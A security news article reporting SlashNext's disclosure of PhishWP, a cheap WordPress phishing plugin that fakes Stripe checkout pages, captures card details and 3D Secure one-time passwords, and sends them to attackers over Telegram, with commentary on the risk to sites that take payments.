SlashNext is warning about PhishWP, a new WordPress plugin that is designed to steal personal payment data. It found the plugin on a Russian cybercrime forum during a regular search for malware. The malware creates a fake payment page and captures customer data. It even intercepts the one-time password (OTP) sent by a 3D Secure (3DS) check sent by a credit card company or bank.
Interception of the OTP is done through pop-ups that appear on the screen. It helps the attackers bypass authentication processes and gives them the key data required to carry out other attacks.
All the data, including the OTP, is sent immediately via Telegram to the cybercriminals. The attack is seamless and gives the customer little to no indication of there being anything wrong.
PhishWP can be installed on any WordPress site once it is compromised. Alternatively, cybercriminals can set up their own fake websites and install them there. The advert for the malware specifically says that it is a Stripe payment plugin for WordPress. However, it is likely that there are other versions for other payment plugins.
What is especially worrying here is the low cost of the plugin. The advert for it says that it is just $1.40 to acquire. What is not clear is if that is a per-transaction price or a single one-off payment. If the latter, the returns to the buyer far outweigh the benefits to the developer.
Key Features of PhishWP
In its disclosure of PhishWP, SlashNext has listed seven key features of the malware:
- Customizable Checkout Pages: Simulates payment processors like Stripe, creating highly convincing fake interfaces.
- 3DS Code Harvesting: Tricks victims into entering one-time passwords (OTPs) via pop-ups, bypassing authentication layers.
- Telegram Integration: Instantly transmits stolen data to attackers for real-time exploitation.
- Browser Profiling: Captures details such as IP addresses, screen resolutions, and user agents to replicate user environments for future fraud.
- Auto-Response Emails: Sends fake order confirmations to victims, delaying suspicion and detection.
- Multi-Language Support: Enables global phishing campaigns by accommodating multiple languages.
- Obfuscation Options: Provides an obfuscated version of the plugin for stealth or source code for advanced customizations.
Enterprise Times: What does this mean?
PhishWP is a new tool designed to be deployed quickly and easily by cybercriminals. Its low cost will make it attractive to anyone who wants to harvest payment details. The acquisition of the OTP and other data will allow attackers to make purchases using the customer data or sell the bundle of data to other people.
From the information provided by SlashNext, it will be difficult, if not impossible, for users to spot the malware. The problem is that it appears seamless and can be customised to keep it up to date with any changes made by payment processors such as Stripe.
The company says that its Browser Phishing Protection will detect malware. Whether other security products will detect it is not clear. At the time of writing, no other security vendor has mentioned the threat from PhishWP. Now it is known, expect other tool vendors to do more to detect it.
The main onus for protection, however, should be on those site owners who take payments through their websites. They need to make sure that they have proper security tools and processes in place to stop the installation of malicious plugins like this.
